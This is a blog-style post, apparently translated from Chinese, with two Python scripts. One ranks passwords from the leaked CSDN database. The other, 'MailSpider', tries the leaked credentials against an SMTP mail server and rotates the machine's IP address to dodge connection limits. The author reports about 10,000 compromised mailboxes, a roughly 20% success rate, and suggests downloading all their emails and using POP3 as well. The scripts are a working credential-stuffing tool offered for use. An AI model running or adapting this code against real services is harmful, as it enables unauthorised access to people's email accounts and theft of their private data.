Human knowledge belongs to the world! (The question has nothing to do with the body ...)

Well, it's actually an evil thing. If you understand it, you can just read it. You have edited it. Please skip it! ^

'''@file: PswList_Csdn.py@auth:     GaA.Ra@date:   2011.12.23@ver :   Python3.2'''g_ResultList = []def AnalyzeData():    global g_ResultList    print(' [*] Begin to Analyze Password...')    fileDB = open('www.csdn.net.sql', 'rb')    analyzeResult = {}    for dbRecord in fileDB:        acountData = dbRecord.strip().split(b' # ')        password = acountData[1]        try:            countPwd = analyzeResult[password]            countPwd[0] += 1            analyzeResult[password] = countPwd        except KeyError:            analyzeResult[password] = [1, password]    g_ResultList = sorted(analyzeResult.values(), reverse = True)    print(' [*] All Done...')    def SaveResult():    global g_ResultList    print(' [*] Begin to Save Result...')    fileResult = open('PasswordList-Csdn.txt', 'w')    for result in g_ResultList:        try:            if result[0] > 2:                print(result[1].decode(), str(result[0]), file = fileResult)        except UnicodeEncodeError:            continue        except UnicodeDecodeError:            continue    print(' [*] All Done...')if __name__ == '__main__':    AnalyzeData()    SaveResult()

'''@file:    MailSpider.py@auth:       GaA.Ra@date:     2011.12.23@ver :     Python3.2    For LinuxOS only, BackTrack5 Best'''import osimport sysfrom os.path import isfilefrom smtplib import SMTPfrom smtplib import SMTPAuthenticationError as AuthErrorfrom smtplib import SMTPConnectError as ConnErrorg_WorkingPath  = os.getcwd()g_ResultDBName = 'Result'g_ResultCount  = 1g_TryIndex     = 0g_MailDBName   = 'Data'g_MailDBList   = None# not all mail site support smtpg_MailServer   = 'smtp.xxx.com'# using ur own gatewayg_GateWay = '192.168.1.1'g_IPCount = 0g_IPList  = []def Init():    global g_ResultDBName    print(' MailSpider0.1 GaA.Ra ')    if not isfile(g_ResultDBName):        file = open(g_ResultDBName, 'w')        file.close()    GetIPList()    GetMailDBList()    def PrintError(Message):    print(' [!] ' + Message)def PrintStatus(Message):    print(' [*] ' + Message)    def ChangeIP(IP):    global g_GateWay    PrintStatus('Changing IP...' + IP)    if g_GateWay == None:        g_GateWay = input(' [*] GateWay: ')    ret1 = os.system('ifconfig eth0 down')    ret2 = os.system('ifconfig eth0 ' + IP + ' netmask 255.255.255.0 up')    ret3 = os.system('route add default gw ' + g_GateWay)    if ret1 !=0 or ret2 !=0 or ret3 != 0:        PrintError('ChangeIP Error...')    def GetIP():    global g_IPCount    global g_IPList    if g_IPCount < len(g_IPList):        IP = g_IPList[g_IPCount].strip()        g_IPCount += 1        return IP    else:        PrintError('Out of ip address...')        return None    def GetIPList():    global g_GateWay    ret = os.system('nmap -p 80 -PR ' + g_GateWay + '/24 | grep report > result.txt')    if ret != 0:        PrintError('Nmap Scan Error...')    resultSet = set()    scanResult = open('result.txt', 'r')    for line in scanResult:        line = line.strip()        line = line.split(' ')[-1]        line = line.split('.')[-1]        resultSet.add(line)    scanResult.close()    os.system('rm result.txt')    for x in range(1, 255):        x = str(x)        if x not in resultSet:            x = g_GateWay[0:g_GateWay.rfind('.') + 1] + x            g_IPList.append(x)            def GetMailDBList():    global g_MailDBList    global g_MailDBName    mailDBFile = open(g_MailDBName, 'rb')    g_MailDBList = mailDBFile.readlines()    def TryLogin(Index, User, Pass, ResultFile):    global g_ResultCount    global g_MailServer    try:        mailServer = SMTP(g_MailServer)        print(' [*] Try Login: ',Index, User, Pass, end = '')        mailServer.login(User, Pass)        print(' --> Success...')        print('%05d user: %s password: %s' % (g_ResultCount, User, Pass), file = ResultFile)        mailServer.quit()        return True            except AuthError:        print(' ')        mailServer.quit()        return False        except KeyboardInterrupt:        PrintStatus('User Exiting...')        ResultFile.flush()        ResultFile.close()        sys.exit()def MailSpider():    global g_ResultDBName    global g_MailDBName    global g_ResultCount    global g_MailDBList    global g_TryIndex    resultFile = open(g_ResultDBName, 'a')            for tryIndex in range(0, len(g_MailDBList)):        try:            acountData = g_MailDBList[g_TryIndex].decode().strip().split(' ')            userName = acountData[0]            passWord = acountData[1]                    except IndexError:            return True                except UnicodeDecodeError:            print('UnicodeDecodeError...Continue...')            g_TryIndex += 1            continue        try:            trySuccess = TryLogin(g_TryIndex, userName, passWord, resultFile)            if trySuccess == True:                g_ResultCount += 1            else:                pass            g_TryIndex += 1                except ConnError:            resultFile.flush()            resultFile.close()            return False        return Truedef Run():    Init()    while True:        IP = GetIP()        if IP == None:            break        else:            ChangeIP(IP)            try:                finish = MailSpider()            except KeyboardInterrupt:                return            except:                print('May be IP crash or Connect timeout...Continue...')                            if finish:                PrintStatus('All Done...')                return                     if __name__ == '__main__':    Run()

Pswlist is used to count weak passwords. If the number of weak passwords exceeds three times, it is recorded. This dictionary contains 16 million records.

Mailspider IP switching is more convenient for students with independent IP addresses. I am a campus network and the school is an independent IP address, so... IP switching is mainly because some servers limit the maximum number of IP connections.

NMAP scanning mainly uses ARP to scan the active host in the network segment. grep gets the result of the active host and filters out the result (using the set operation) to obtain the IP address that can be switched and store it. the IP address switch uses the ifconfig and route commands. when a digital mailbox server connects more than 700 times, it will prompt that there are too many IP connections and connection requests are rejected, the human flesh test was probably limited to about one hour (when I came back from a meal, I saw a good collection, and half of them passed --)

One day (12 hours), at the lab, the network was good and bad. About 30000 pieces of data were processed, and the success rate was about 20% (okay, I have collected about 10000 pieces of data). I think that's the case. Don't do anything bad. maybe you can write a script to put all emails down and perform local data mining. it only takes time.

PS: Except for the SMTP protocol, the POP3 protocol can be used for XXX, but the POP3 protocol is about 10 times slower than SMTP (non-accurate value). You can understand it smartly ^